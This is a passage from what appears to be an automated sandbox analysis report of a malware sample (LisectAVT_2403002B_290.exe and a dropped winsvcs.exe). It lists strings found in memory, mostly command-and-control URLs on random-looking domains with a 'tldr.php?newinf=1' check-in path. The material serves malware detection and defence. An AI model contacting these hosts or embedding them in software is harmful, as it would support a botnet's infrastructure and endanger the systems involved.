00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fuaiuebndieufeufu.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuaiuebndieufeufu.biz/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fuaiuebndieufeufu.com/
        Source: LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuaiuebndieufeufu.com/http://eiifngjfksisiufjf.com/http://eoroooskfogihisrg.com/http://noeuao
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuaiuebndieufeufu.com/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuaiuebndieufeufu.com/tldr.php?newinf=1B
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fuaiuebndieufeufu.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuaiuebndieufeufu.in/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fuaiuebndieufeufu.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fuaiuebndieufeufu.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuaiuebndieufeufu.net/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fuaiuebndieufeufu.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuaiuebndieufeufu.ru/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fuaiuebndieufeufu.su/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuaiuebndieufeufu.su/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fuaiuebndieufeufu.su/tldr.php?newinf=1L0
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://iuirshriuisruruuf.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iuirshriuisruruuf.biz/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://iuirshriuisruruuf.com/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iuirshriuisruruuf.com/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iuirshriuisruruuf.com/tldr.php?newinf=1wk
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://iuirshriuisruruuf.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iuirshriuisruruuf.in/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iuirshriuisruruuf.in/tldr.php?newinf=1bh
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://iuirshriuisruruuf.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://iuirshriuisruruuf.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iuirshriuisruruuf.net/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://iuirshriuisruruuf.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iuirshriuisruruuf.ru/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://iuirshriuisruruuf.su/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iuirshriuisruruuf.su/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iuirshriuisruruuf.su/tldr.php?newinf=1so
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nnososoosjfeuhueu.biz/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nnososoosjfeuhueu.com/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nnososoosjfeuhueu.com/srndndubsbsifurfd.biz5
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nnososoosjfeuhueu.com/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nnososoosjfeuhueu.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nnososoosjfeuhueu.in/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://nnososoosjfeuhueu.info/
